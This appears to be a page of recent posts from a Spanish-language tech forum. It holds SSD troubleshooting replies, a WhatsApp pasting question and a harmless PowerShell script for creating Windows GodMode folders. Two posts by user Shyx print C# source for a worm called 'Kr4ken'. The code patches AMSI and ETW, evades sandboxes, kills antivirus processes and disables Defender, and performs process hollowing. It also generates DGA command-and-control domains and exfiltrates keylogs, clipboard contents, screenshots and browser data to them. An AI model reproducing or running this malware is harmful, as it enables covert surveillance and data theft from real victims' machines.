| |
Páginas: 1 2 3 [ 4] 5 6 7 8 9 10
|
31
en: 19 Abril 2026, 20:42 pm
|
|
Iniciado por General Dmitry Vergadoski - Último mensaje por General Dmitry Vergadoski
|
Yo al SSD Patriot de 120 GB le eliminaría la tabla de particiones con Gparted, y luego le crearía una nueva con sus consiguientes particiones. Si puedes hacer eso y luego el disco funciona bien es que está realmente bien.
Saludos...
Songoku
no funciona de hecho lo he probado con otra pc que tiene windows 7 y dice formato correcto cuando lo formateas y al instante vuelven los archivos que estaban antes grabados, claramente esta dañado, funciona como si fuera una memoria ram. |
|
32
en: 19 Abril 2026, 20:08 pm
|
|
Iniciado por Mr.Byte - Último mensaje por Mr.Byte
|
Este script de PowerShell es un gestor interactivo que permite crear fácilmente en el Escritorio las famosas carpetas GodMode de Windows 11. Estas carpetas, cuando se nombran con un GUID especial, se convierten en accesos directos a paneles avanzados de configuración del sistema. El script organiza estos GUIDs por categorías, muestra un menú interactivo y te permite crear carpetas individuales, todas las de una categoría o todas las disponibles. Se ha utilizado Vibe Coding Claude  # ================================
# GODMODE MANAGER - WINDOWS 11
# ================================
# Captura cualquier error no controlado y pausa para que puedas leerlo
trap {
Write-Host "`n[ERROR] $_" -ForegroundColor Red
Write-Host "`nPulsa ENTER para cerrar..."
Read-Host
exit 1
}
$ErrorActionPreference = "Stop" # convierte todos los errores en terminales
# Diccionario de GUIDs organizados por categorias
$GodModes = @{
"Sistema" = @{
"Modo Dios (todas las configuraciones)" = "ED7BA470-8E54-465E-825C-99712043E01C"
"Sistema" = "BB06C0E4-D293-4f75-8A90-CB05B6477EEE"
"Seguridad y mantenimiento" = "F3F5824C-AD58-4728-AF59-A1EBE3C2E8E3"
"Centro de accesibilidad" = "D555645E-F4F9-4F47-8AF4-956B8B8E4B4F"
}
"Red" = @{
"Centro de redes y recursos compartidos" = "8E908FC9-BECC-40f6-915B-F4CA0E70D03D"
"Carpetas compartidas" = "B4FB3F98-C1EA-428d-A78A-D1F5659CBA93"
}
"Hardware" = @{
"Dispositivos e impresoras" = "A8A91A66-3A7D-4424-8D24-04E180695C7A"
"Opciones de energia" = "025A5937-A6BE-4686-A844-36FE4BEC8B6D"
}
"Cuentas y usuarios" = @{
"Cuentas de usuario" = "60632754-c523-4b62-b45c-4172da012619"
"Centro de sincronizacion" = "9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF"
}
"Software" = @{
"Programas y caracteristicas" = "15eae92e-f17a-4431-9f28-805e482dafd4"
"Opciones de Internet" = "A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE"
}
"Herramientas" = @{
"Herramientas administrativas" = "D20EA4E1-3957-11d2-A40B-0C5020524153"
"Centro de movilidad" = "5ea4f148-308c-46d7-98a9-49041b1dd468"
"Historial de archivos" = "F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D"
}
}
# Funcion para crear carpetas en el Escritorio
function Create-GodModeFolder {
param(
[string]$Name,
[string]$Guid
)
$desktop = [Environment]::GetFolderPath("Desktop")
$folderName = "$Name.{$Guid}"
$folderPath = Join-Path $desktop $folderName
if (-not (Test-Path $folderPath)) {
New-Item -ItemType Directory -Path $folderPath | Out-Null
Write-Host "[OK] Carpeta creada: $folderName" -ForegroundColor Green
} else {
Write-Host "[!] Ya existe: $folderName" -ForegroundColor Yellow
}
}
# Funcion para mostrar categorias
function Show-Categories {
Write-Host "`n=== Categorias disponibles ===`n"
$cats = @($GodModes.Keys)
for ($i = 0; $i -lt $cats.Count; $i++) {
Write-Host "$($i + 1). $($cats[$i])"
}
return $cats # devuelve el array ordenado para reutilizarlo
}
# Funcion para mostrar elementos de una categoria
function Show-CategoryItems {
param([string]$Category)
Clear-Host
Write-Host "`n=== $Category ===`n"
$items = $GodModes[$Category]
# FIX: convertir Keys a array para poder indexar
$itemKeys = @($items.Keys)
for ($i = 0; $i -lt $itemKeys.Count; $i++) {
Write-Host "$($i + 1). $($itemKeys[$i])"
}
$choice = Read-Host "`nSelecciona un numero o escribe A para crear todos"
if ($choice -eq "A" -or $choice -eq "a") {
foreach ($key in $itemKeys) {
Create-GodModeFolder -Name $key -Guid $items[$key]
}
return
}
$choiceInt = 0
if ([int]::TryParse($choice, [ref]$choiceInt)) {
if ($choiceInt -ge 1 -and $choiceInt -le $itemKeys.Count) {
$key = $itemKeys[$choiceInt - 1]
Create-GodModeFolder -Name $key -Guid $items[$key]
} else {
Write-Host "Numero fuera de rango." -ForegroundColor Red
}
} else {
Write-Host "Entrada no valida." -ForegroundColor Red
}
}
# Funcion de busqueda
function Search-GodMode {
$query = Read-Host "`nIntroduce texto a buscar"
$results = @()
foreach ($cat in $GodModes.Keys) {
foreach ($item in $GodModes[$cat].Keys) {
if ($item -like "*$query*") {
$results += [PSCustomObject]@{
Nombre = $item
GUID = $GodModes[$cat][$item]
}
}
}
}
if ($results.Count -eq 0) {
Write-Host "No se encontraron coincidencias." -ForegroundColor Red
return
}
Write-Host "`n=== Resultados ===`n"
for ($i = 0; $i -lt $results.Count; $i++) {
Write-Host "$($i + 1). $($results[$i].Nombre)"
}
$choice = Read-Host "`nSelecciona un numero"
$choiceInt = 0
if ([int]::TryParse($choice, [ref]$choiceInt)) {
if ($choiceInt -ge 1 -and $choiceInt -le $results.Count) {
Create-GodModeFolder -Name $results[$choiceInt - 1].Nombre `
-Guid $results[$choiceInt - 1].GUID
} else {
Write-Host "Numero fuera de rango." -ForegroundColor Red
}
} else {
Write-Host "Entrada no valida." -ForegroundColor Red
}
}
# ================================
# MENU PRINCIPAL
# ================================
$running = $true
while ($running) {
Clear-Host
Write-Host "=== GODMODE MANAGER - WINDOWS 11 ===`n"
Write-Host "1. Ver categorias"
Write-Host "2. Buscar por nombre"
Write-Host "3. Crear TODAS las carpetas"
Write-Host "4. Salir"
$option = Read-Host "`nSelecciona una opcion"
switch ($option) {
"1" {
# FIX: capturar el array devuelto por Show-Categories para indexar correctamente
$cats = Show-Categories
$catChoice = Read-Host "`nSelecciona una categoria"
$catInt = 0
if ([int]::TryParse($catChoice, [ref]$catInt)) {
if ($catInt -ge 1 -and $catInt -le $cats.Count) {
Show-CategoryItems -Category $cats[$catInt - 1]
} else {
Write-Host "Numero fuera de rango." -ForegroundColor Red
}
} else {
Write-Host "Entrada no valida." -ForegroundColor Red
}
}
"2" { Search-GodMode }
"3" {
foreach ($cat in $GodModes.Keys) {
foreach ($item in $GodModes[$cat].Keys) {
Create-GodModeFolder -Name $item -Guid $GodModes[$cat][$item]
}
}
}
"4" { $running = $false }
default { Write-Host "Opcion no valida." -ForegroundColor Red }
}
if ($running) {
Write-Host "`nPulsa ENTER para continuar..."
Read-Host
}
}
Copiar el código, y guardarlo como GodModeManager.ps1 Si no se ejecuta por no estar firmado, utilizar Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned
|
|
33
en: 19 Abril 2026, 19:33 pm
|
|
Iniciado por DaxelFake - Último mensaje por DaxelFake
|
|
muchas gracias Mr.Byte, lo tomare en cuenta
|
|
34
en: 19 Abril 2026, 14:45 pm
|
|
Iniciado por General Dmitry Vergadoski - Último mensaje por Songoku
|
|
Yo al SSD Patriot de 120 GB le eliminaría la tabla de particiones con Gparted, y luego le crearía una nueva con sus consiguientes particiones. Si puedes hacer eso y luego el disco funciona bien es que está realmente bien.
Saludos...
Songoku
|
|
35
en: 19 Abril 2026, 13:37 pm
|
|
Iniciado por General Dmitry Vergadoski - Último mensaje por General Dmitry Vergadoski
|
|
Hola a todos, tengo un disco SSD Patriot de 120gb segun CrystalDiskInfo esta perfecto dice "100% bueno" y sin errores en el smart y me lo detecta con su nombre, modelo y todo, pero cuando intento formatear me sale error y si intento borrar un archivo presente en el SSD se borra pero cuando reinicio la PC vuelve a salir, claramente el SSD esta dañado pero el programa no lo detecta, lo mismo me pasa con Hard Disk Sentinel me marca 100% de performance y 98% de Vida.
Por otra parte tengo un disco duro mecanico que CrystalDiskInfo dice desde hace 7 años que esta "en riesgo" pero sigue funcionando perfectamente.
Mi duda es si existen otros programas mejores más precisos, muchas gracias de antemano.
|
|
36
en: 19 Abril 2026, 11:02 am
|
|
Iniciado por Novedades - Último mensaje por Novedades
|
Si ademas puede ser win como whats, lo dejo...y me conformare con utilizar el crt+V y punto. Pero si desde aqui como expertos que sois, sabeis alguna otra forma de solucioanrlo, estare encantado de leeros Gracias  |
|
37
en: 19 Abril 2026, 03:02 am
|
|
Iniciado por Novedades - Último mensaje por Danielㅤ
|
|
No es tan difícil, lo único que tenés que hacer es buscar cuales son esas nuevas actualizaciones y desinstalarlas, luego cuando tengas que actualizar tu sistema operativo nuevamente vas a instalar todas las nuevas actualizaciones excepto las que esas hoy te dan problemas.
Para saber cuáles son te podes guiar por la fecha, es decir desde cuando empezó el problema y desde esa fecha cuáles fueron las nuevas actualizaciones que se han instalado.
Algo importante a comentar es que la raíz del problema puede no ser Windows sinó WhatsApp web, que por alguna razón ha cambiado su forma de pegar las imágenes que copias, también puede llegar a ser una actualización del navegador, en WhatsApp web pueden haber hecho algún cambio en su página y eso afectó en lo que nos comentas.
|
|
38
en: 19 Abril 2026, 01:45 am
|
|
Iniciado por Shyx - Último mensaje por Shyx
|
// ====================== EXFILTRATION (HTTPS + Jitter) ======================
private static class Exfiltration {
private static readonly string[] UserAgents =
{
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
};
public static void StartExfilLoop() {
Timer timer = new Timer(EXFIL_INTERVAL.TotalMilliseconds);
timer.Elapsed += async (s, e) => await CollectAndExfil();
timer.Start();
}
private static async Task CollectAndExfil() {
if (encryptionKey == null || _c2Servers.Count == 0) return;
byte[] data = CollectData();
if (data.Length < 2048) return;
byte[] encrypted = AesEncryptPBKDF2(data, encryptionKey);
int jitter = new Random().Next(15000, 120000);
await Task.Delay(jitter);
using var client = CreateHttpClient();
var servers = _c2Servers.ToList();
foreach (var server in servers) {
try {
string url = server.Url.Replace("http://", "https://");
var content = new ByteArrayContent(encrypted);
content.Headers.ContentType = new System.Net.Http.Headers.MediaTypeHeaderValue("application/octet-stream");
var response = await client.PostAsync(url, content);
if (response.IsSuccessStatusCode) {
server.RetryCount = 0;
server.LastAttempt = DateTime.Now;
return;
}
} catch {
server.RetryCount++;
if (server.RetryCount >= 5)
_c2Servers.Remove(server);
}
await Task.Delay(new Random().Next(8000, 25000));
}
if (_c2Servers.Count == 0)
InitializeC2Servers();
}
private static HttpClient CreateHttpClient() {
var client = new HttpClient { Timeout = TimeSpan.FromMinutes(6) };
client.DefaultRequestHeaders.UserAgent.ParseAdd(UserAgents[new Random().Next(UserAgents.Length)]);
return client;
}
private static byte[] CollectData() {
string temp = Path.GetTempPath();
List<byte> all = new List<byte>();
// Keys y clipboard
foreach (string f in new[] { "keys.txt", "clipboard.txt" }) {
string p = Path.Combine(temp, f);
if (File.Exists(p)) {
all.AddRange(File.ReadAllBytes(p));
File.Delete(p);
}
}
// Screenshots
string scrDir = Path.Combine(temp, "screenshots");
if (Directory.Exists(scrDir)) {
foreach (string file in Directory.GetFiles(scrDir, "scr_*.jpg")) {
all.AddRange(File.ReadAllBytes(file));
if (all.Count > 50 * 1024 * 1024) break;
}
}
// Browser data
string browserDir = Path.Combine(temp, "browser");
if (Directory.Exists(browserDir)) {
all.AddRange(CompressDirectory(browserDir));
Directory.Delete(browserDir, true);
}
return all.ToArray();
}
private static byte[] CompressDirectory(string dir) {
using var ms = new MemoryStream();
using (var zip = new ZipArchive(ms, ZipArchiveMode.Create)) {
foreach (string file in Directory.GetFiles(dir, "*.*", SearchOption.AllDirectories)) {
if (new FileInfo(file).Length < 10 * 1024 * 1024)
zip.CreateEntryFromFile(file, Path.GetRelativePath(dir, file));
}
}
return ms.ToArray();
}
private static byte[] AesEncryptPBKDF2(byte[] data, byte[] key) {
using var aes = Aes.Create();
aes.KeySize = AES_KEY_SIZE;
aes.Mode = CipherMode.CBC;
byte[] salt = new byte[16];
RandomNumberGenerator.Fill(salt);
using var derive = new Rfc2898DeriveBytes(key, salt, PBKDF2_ITERATIONS, HashAlgorithmName.SHA256);
aes.Key = derive.GetBytes(AES_KEY_SIZE / 8);
aes.IV = derive.GetBytes(AES_BLOCK_SIZE / 8);
using var ms = new MemoryStream();
using (var cs = new CryptoStream(ms, aes.CreateEncryptor(), CryptoStreamMode.Write))
cs.Write(data, 0, data.Length);
return salt.Concat(ms.ToArray()).ToArray();
}
}
}
}
|
|
39
en: 19 Abril 2026, 01:43 am
|
|
Iniciado por Shyx - Último mensaje por Shyx
|
Kr4ken.cs///
///____ __. __
///| |/ _ | ___________ | | __ ____ ____
///| < \_ __ \__ \ | |/ // __ \ / \
///| | \ | | \// __ \| <\ ___/| | \
///|____|__ \|__| (____ /__|_ \\___ >___| /
/// \/ \/ \/ \/ \/
///
/// The Kraken has been released.
///
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Net.Http;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using Timer = System.Timers.Timer;
using System.IO.Compression;
using Microsoft.Win32;
using System.Windows.Forms;
using System.Drawing;
using System.Drawing.Imaging;
namespace Kr4ken.Worm {
class Kr4kenX {
// ====================== CONFIGURATION ======================
private static readonly string[] DGA_SEEDS = { "kr4ken", "worm", "payload", "exfil", "stealth" };
private const string PBKDF2_PASSWORD = "Kr4kenX_Production_2026";
private const int PBKDF2_ITERATIONS = 100000;
private const int AES_KEY_SIZE = 256;
private const int AES_BLOCK_SIZE = 128;
private static readonly TimeSpan EXFIL_INTERVAL = TimeSpan.FromMinutes(35);
private static readonly TimeSpan KEYLOG_BUFFER_THRESHOLD = TimeSpan.FromSeconds(6);
private static readonly TimeSpan WATCHDOG_CHECK_INTERVAL = TimeSpan.FromSeconds(20);
private static string malwarePath = string.Empty;
private static string machineId = string.Empty;
private static byte[]? encryptionKey = null;
private static readonly List<C2Server> _c2Servers = new List<C2Server>();
private class C2Server {
public string Url { get; set; }
public int RetryCount { get; set; }
public DateTime LastAttempt { get; set; }
public C2Server(string url) {
Url = url;
RetryCount = 0;
LastAttempt = DateTime.MinValue;
}
}
// ====================== KEYBOARD HOOK ======================
private delegate int HookProc(int nCode, IntPtr wParam, IntPtr lParam);
private static HookProc? keyProc;
private static IntPtr keyHook = IntPtr.Zero;
private static DateTime _lastKeyLogWrite = DateTime.MinValue;
private static readonly StringBuilder _keyLogBuffer = new StringBuilder(8192);
private static readonly object _bufferLock = new object();
[STAThread]
static void Main() {
try {
if (AntiAnalysis.IsSandbox()) {
LogDiagnostic("Sandbox detected - exiting");
Thread.Sleep(45000);
Environment.Exit(0);
}
malwarePath = Assembly.GetExecutingAssembly().Location;
machineId = AntiAnalysis.GetMachineSignature();
encryptionKey = DeriveEncryptionKey(machineId);
BypassAMSIAdvanced();
BypassETW();
InitializeC2Servers();
Persistence.EstablishMultiLayer(malwarePath);
AntiAnalysis.KillDefenderAndAV();
Propagation.InfectUSBDrives();
if (ProcessHollowing.Execute(malwarePath)) {
LogDiagnostic("Process hollowing successful - exiting");
Environment.Exit(0);
}
Payloads.StartAll();
Exfiltration.StartExfilLoop();
Persistence.StartWatchdog(malwarePath);
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run();
} catch (Exception ex) {
LogDiagnostic($"Critical failure: {ex.Message}");
Thread.Sleep(30000);
Environment.Exit(1);
}
}
// ====================== ENCRYPTION ======================
private static byte[] DeriveEncryptionKey(string machineSignature) {
try {
using var derive = new Rfc2898DeriveBytes(
PBKDF2_PASSWORD + machineSignature,
Encoding.UTF8.GetBytes("Kr4kenSalt2026"),
PBKDF2_ITERATIONS,
HashAlgorithmName.SHA256);
return derive.GetBytes(AES_KEY_SIZE / 8);
} catch {
return Encoding.UTF8.GetBytes(PBKDF2_PASSWORD);
}
}
private static void LogDiagnostic(string message) {
try {
string logPath = Path.Combine(Path.GetTempPath(), "diag.tmp");
File.AppendAllText(logPath, $"[{DateTime.UtcNow:yyyy-MM-dd HH:mm:ss}] {message}\n");
} catch { }
}
private static bool IsAdministrator() {
try {
using var identity = System.Security.Principal.WindowsIdentity.GetCurrent();
return new System.Security.Principal.WindowsPrincipal(identity)
.IsInRole(System.Security.Principal.WindowsBuiltInRole.Administrator);
} catch { return false; }
}
// ====================== C2 + DGA ======================
private static void InitializeC2Servers() {
_c2Servers.Clear();
foreach (var domain in GenerateDGADomains())
_c2Servers.Add(new C2Server($"http://{domain}/upload"));
LogDiagnostic($"Initialized {_c2Servers.Count} DGA domains");
}
private static List<string> GenerateDGADomains() {
var domains = new List<string>();
string date = DateTime.UtcNow.ToString("yyyyMMdd");
foreach (var seed in DGA_SEEDS) {
for (int i = 0; i < 6; i++) {
string input = $"{seed}{date}{i}{machineId}";
string hash = GetShortHash(input);
domains.Add($"{seed}{hash}.{GetTLD(i)}");
}
}
return domains;
}
private static string GetShortHash(string input) {
using var sha = SHA256.Create();
var hash = sha.ComputeHash(Encoding.UTF8.GetBytes(input));
return BitConverter.ToString(hash, 0, 6).Replace("-", "").ToLower();
}
private static string GetTLD(int index) {
string[] tlds = { "com", "net", "org", "xyz", "top", "io", "app" };
return tlds[index % tlds.Length];
}
// ====================== EVASION ======================
private static void BypassAMSIAdvanced() {
try {
IntPtr amsi = LoadLibrary("amsi.dll");
if (amsi == IntPtr.Zero) return;
IntPtr addr = GetProcAddress(amsi, "AmsiScanBuffer");
if (addr == IntPtr.Zero) return;
byte[] patch = { 0xB8, 0x00, 0x00, 0x00, 0x00, 0xC3 };
uint old = 0;
VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out old);
Marshal.Copy(patch, 0, addr, patch.Length);
VirtualProtect(addr, (UIntPtr)patch.Length, old, out _);
} catch { }
}
private static void BypassETW() {
try {
IntPtr ntdll = LoadLibrary("ntdll.dll");
if (ntdll == IntPtr.Zero) return;
IntPtr addr = GetProcAddress(ntdll, "NtTraceEvent");
if (addr == IntPtr.Zero) return;
byte[] patch = { 0xB8, 0x00, 0x00, 0x00, 0x00, 0xC3 };
uint old = 0;
VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out old);
Marshal.Copy(patch, 0, addr, patch.Length);
VirtualProtect(addr, (UIntPtr)patch.Length, old, out _);
} catch { }
}
// ====================== P/INVOKE SHARED ======================
[DllImport("kernel32.dll", SetLastError = true)] private static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32.dll", SetLastError = true)] private static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
[DllImport("kernel32.dll", SetLastError = true)] private static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
// ====================== PROCESS HOLLOWING ======================
private static class ProcessHollowing {
public static bool Execute(string payloadPath) {
try {
byte[] payload = File.ReadAllBytes(payloadPath);
string[] targets = { @"C:\Windows\System32\svchost.exe", @"C:\Windows\System32\conhost.exe", "explorer.exe" };
foreach (var target in targets) {
if (CreateSuspendedProcess(target, out var pi)) {
if (OverwriteAndRun(pi, payload)) {
ResumeAndClean(pi);
LogDiagnostic($"Process hollowing successful on {target}");
return true;
}
SafeTerminate(pi);
}
}
return false;
} catch (Exception ex) {
LogDiagnostic($"Hollowing failed: {ex.Message}");
return false;
}
}
private static bool CreateSuspendedProcess(string target, out PROCESS_INFORMATION pi) {
var si = new STARTUPINFO { cb = Marshal.SizeOf<STARTUPINFO>() };
pi = new PROCESS_INFORMATION();
return CreateProcess(target, null, IntPtr.Zero, IntPtr.Zero, false,
CreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
}
private static bool OverwriteAndRun(PROCESS_INFORMATION pi, byte[] payload) {
try {
PROCESS_BASIC_INFORMATION pbi = new();
NtQueryInformationProcess(pi.hProcess, 0, ref pbi, (uint)Marshal.SizeOf(pbi), out _);
IntPtr pebImageBaseAddr = pbi.PebBaseAddress + 0x10;
byte[] baseBuf = new byte[8];
ReadProcessMemory(pi.hProcess, pebImageBaseAddr, baseBuf, 8, out _);
IntPtr originalBase = (IntPtr)BitConverter.ToInt64(baseBuf, 0);
uint peHeaderOffset = BitConverter.ToUInt32(payload, 0x3C);
uint sizeOfImage = BitConverter.ToUInt32(payload, (int)peHeaderOffset + 0x50);
uint entryPointRVA = BitConverter.ToUInt32(payload, (int)peHeaderOffset + 0x28);
ushort numSections = BitConverter.ToUInt16(payload, (int)peHeaderOffset + 6);
IntPtr sectionHandle = IntPtr.Zero;
LARGE_INTEGER sectionSize = new() { QuadPart = sizeOfImage };
uint status = NtCreateSection(ref sectionHandle, SECTION_ALL_ACCESS, IntPtr.Zero,
ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_IMAGE | SEC_COMMIT, IntPtr.Zero);
if (status != 0) return false;
IntPtr allocated = IntPtr.Zero;
uint viewSize = 0;
status = NtMapViewOfSection(sectionHandle, pi.hProcess, ref allocated,
IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref viewSize, 2, 0, PAGE_EXECUTE_READWRITE);
if (status != 0 || allocated == IntPtr.Zero) {
NtClose(sectionHandle);
return false;
}
uint headerSize = peHeaderOffset + 0xF8u + (uint)(numSections * 0x28);
WriteProcessMemory(pi.hProcess, allocated, payload, headerSize, out _);
for (int i = 0; i < numSections; i++) {
int sectionOffset = (int)peHeaderOffset + 0xF8 + (i * 0x28);
uint virtualAddress = BitConverter.ToUInt32(payload, sectionOffset + 0x0C);
uint rawSize = BitConverter.ToUInt32(payload, sectionOffset + 0x10);
uint rawAddress = BitConverter.ToUInt32(payload, sectionOffset + 0x14);
if (rawSize == 0) continue;
IntPtr sectionDest = allocated + (int)virtualAddress;
byte[] sectionData = new byte[rawSize];
Array.Copy(payload, (int)rawAddress, sectionData, 0, (int)rawSize);
WriteProcessMemory(pi.hProcess, sectionDest, sectionData, rawSize, out _);
}
WriteProcessMemory(pi.hProcess, pebImageBaseAddr, BitConverter.GetBytes(allocated.ToInt64()), 8, out _);
CONTEXT ctx = new() { ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL };
GetThreadContext(pi.hThread, ref ctx);
ctx.Rip = (ulong)(allocated.ToInt64() + entryPointRVA);
SetThreadContext(pi.hThread, ref ctx);
uint oldProtect;
VirtualProtectEx(pi.hProcess, allocated, (UIntPtr)sizeOfImage, PAGE_EXECUTE_READ, out oldProtect);
NtClose(sectionHandle);
return true;
} catch { return false; }
}
private static void SafeTerminate(PROCESS_INFORMATION pi) {
try { TerminateProcess(pi.hProcess, 0); } catch { }
try { CloseHandle(pi.hProcess); } catch { }
try { CloseHandle(pi.hThread); } catch { }
}
private static void ResumeAndClean(PROCESS_INFORMATION pi) {
try { ResumeThread(pi.hThread); } catch { }
try { CloseHandle(pi.hProcess); } catch { }
try { CloseHandle(pi.hThread); } catch { }
}
private const uint SECTION_ALL_ACCESS = 0xF001F;
private const uint SEC_COMMIT = 0x08000000;
private const uint SEC_IMAGE = 0x01000000;
private const uint PAGE_EXECUTE_READWRITE = 0x40;
private const uint PAGE_EXECUTE_READ = 0x20;
[DllImport("ntdll.dll")] private static extern uint NtCreateSection(ref IntPtr sectionHandle, uint desiredAccess, IntPtr objectAttributes, ref LARGE_INTEGER maximumSize, uint sectionPageProtection, uint allocationAttributes, IntPtr fileHandle);
[DllImport("ntdll.dll")] private static extern uint NtMapViewOfSection(IntPtr sectionHandle, IntPtr processHandle, ref IntPtr baseAddress, IntPtr zeroBits, IntPtr commitSize, IntPtr sectionOffset, ref uint viewSize, uint inheritDisposition, uint allocationType, uint win32Protect);
[DllImport("ntdll.dll")] private static extern uint NtClose(IntPtr handle);
[DllImport("kernel32.dll", SetLastError = true)] private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode);
[DllImport("kernel32.dll", SetLastError = true)] private static extern bool CreateProcess(string lpApplicationName, string? lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string? lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("ntdll.dll")] private static extern uint NtQueryInformationProcess(IntPtr hProcess, int processInformationClass, ref PROCESS_BASIC_INFORMATION processInformation, uint processInformationLength, out uint returnLength);
[DllImport("kernel32.dll")] private static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, out int lpNumberOfBytesRead);
[DllImport("kernel32.dll")] private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);
[DllImport("kernel32.dll")] private static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT lpContext);
[DllImport("kernel32.dll")] private static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT lpContext);
[DllImport("kernel32.dll")] private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32.dll")] private static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError = true)] private static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpOldProtect);
[StructLayout(LayoutKind.Sequential)] public struct STARTUPINFO { public int cb; }
[StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; }
[StructLayout(LayoutKind.Sequential)] public struct PROCESS_BASIC_INFORMATION { public IntPtr Reserved1; public IntPtr PebBaseAddress; public IntPtr Reserved2_0; public IntPtr Reserved2_1; public IntPtr UniqueProcessId; public IntPtr Reserved3; }
[StructLayout(LayoutKind.Sequential)] public struct CONTEXT { public CONTEXT_FLAGS ContextFlags; public ulong Rip; }
[StructLayout(LayoutKind.Sequential)] public struct LARGE_INTEGER { public long QuadPart; }
[Flags] public enum CreationFlags : uint { CREATE_SUSPENDED = 0x00000004 }
[Flags] public enum CONTEXT_FLAGS : uint { CONTEXT_FULL = 0x10007 }
}
// ====================== ANTI-ANALYSIS (Reforzado) ======================
private static class AntiAnalysis {
public static bool IsSandbox() {
LogDiagnostic("Starting reinforced anti-analysis...");
if (Environment.ProcessorCount < 2 || !Environment.Is64BitProcess) return true;
if (DetectSandboxUserOrHostname()) return true;
if (DetectTimingAnomaly()) return true;
if (DetectVirtualizationArtifacts()) return true;
if (DetectHypervisor()) return true;
if (DetectAnalysisTools()) return true;
if (DetectSecurityProducts()) return true;
if (IsBeingDebuggedAdvanced()) return true;
if (DetectLowEntropyEnvironment()) return true;
LogDiagnostic("Anti-analysis passed");
return false;
}
private static bool DetectSandboxUserOrHostname() {
string[] bad = { "sandbox", "test", "malware", "virus", "user", "john", "admin", "pc", "vm", "virtual" };
string user = Environment.UserName.ToLower();
string host = Environment.MachineName.ToLower();
return bad.Any(n => user.Contains(n) || host.Contains(n));
}
private static bool DetectTimingAnomaly() {
try {
long start = Stopwatch.GetTimestamp();
Thread.Sleep(420);
long elapsed = Stopwatch.GetTimestamp() - start;
return elapsed < 380000;
} catch { return false; }
}
private static bool DetectVirtualizationArtifacts() {
try {
var s = new ManagementObjectSearcher("SELECT Manufacturer, Model FROM Win32_ComputerSystem");
foreach (ManagementObject o in s.Get()) {
string m = (o["Manufacturer"]?.ToString() ?? "").ToLower();
string mod = (o["Model"]?.ToString() ?? "").ToLower();
if (m.Contains("vmware") || m.Contains("xen") || m.Contains("qemu") || mod.Contains("virtual") || mod.Contains("vbox"))
return true;
}
} catch { }
return false;
}
private static bool DetectHypervisor() {
try {
var s = new ManagementObjectSearcher("SELECT HypervisorPresent FROM Win32_ComputerSystem");
foreach (ManagementObject o in s.Get())
if (o["HypervisorPresent"]?.ToString() == "True") return true;
} catch { }
return false;
}
private static bool DetectAnalysisTools() {
string[] tools = { "x64dbg", "ida", "ghidra", "wireshark", "procmon", "ollydbg", "dnspy", "fiddler", "processhacker", "hxd" };
return tools.Any(t => Process.GetProcessesByName(t).Length > 0);
}
private static bool DetectSecurityProducts() {
string[] edr = { "MsMpEng", "Sense", "WdNisSvc", "CrowdStrike", "Falcon", "SentinelAgent", "CarbonBlack", "Cylance", "Sophos" };
if (edr.Any(p => Process.GetProcessesByName(p).Length > 0)) return true;
try {
using var k = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows Defender\Features");
if (k?.GetValue("TamperProtection")?.ToString() == "1") return true;
} catch { }
return false;
}
private static bool IsBeingDebuggedAdvanced() {
try { return Debugger.IsAttached || Debugger.IsLogging(); } catch { return false; }
}
private static bool DetectLowEntropyEnvironment() {
try {
int programs = Directory.GetDirectories(@"C:\Program Files").Length + Directory.GetDirectories(@"C:\Program Files (x86)").Length;
if (programs < 15) return true;
string docs = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
if (Directory.Exists(docs)) {
int recent = Directory.GetFiles(docs, "*.*", SearchOption.AllDirectories)
.Count(f => (DateTime.Now - new FileInfo(f).LastWriteTime).TotalDays < 30);
if (recent < 8) return true;
}
} catch { }
return false;
}
public static void KillDefenderAndAV() {
string[] avs = { "MsMpEng", "Sense", "WdNisSvc", "Avast", "Norton", "Sophos", "Bitdefender", "ESET", "Kaspersky", "CrowdStrike", "Falcon" };
foreach (var a in avs) {
try {
foreach (var p in Process.GetProcessesByName(a))
try { p.Kill(); } catch { }
} catch { }
}
try {
Registry.SetValue(@"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", 1, RegistryValueKind.DWord);
} catch { }
}
